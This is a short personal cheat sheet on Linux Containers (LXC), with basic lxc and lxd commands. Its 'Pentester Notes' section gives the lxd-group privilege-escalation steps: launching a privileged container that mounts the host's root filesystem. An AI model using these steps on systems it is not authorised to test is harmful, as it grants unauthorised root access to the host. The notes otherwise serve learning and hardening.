Linux Containers (LXC)

linuxsystemhardening linuxfundamentals linuxprivilegeescalation

Linux Containers (LXC) is a Linux only virtualization method to run multiple Linux systems using the host Linux kernel.

Docker is built over LXC. It provides additional features and a simplified interface. They share the notion of 'image' and 'container'.

LXC can only be used on Linux hosts. Users part of the lxd group can call any commands without sudo.

Random commands:

$ lxd init
$ lxc launch ubuntu:22.04 container_name
$ lxc image import image.tar.gz --alias image_name
$ lxc init image_name container_name
$ lxc start container_name
$ lxc exec container_name /bin/bash

Pentester Notes ☠️

Create a container mounting the underlying file system.

$ lxc init image_name container_name -c security.privileged=true
$ lxc config device add container_name device_name disk source=/ path=/mnt/hostfs recursive=true
$ cd /mnt/hostfs/ # on the container

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

$ lxc image list
$ sudo apt-get install lxc lxc-utils -y
$ sudo lxc-create -n xxx -t yyy
$ lxc-ls
$ lxc-start/stop/restart -n xxx
$ lxc-config -n xxx -s storage/network/security
$ lxc-attach -n xxx [-f /path/to/share]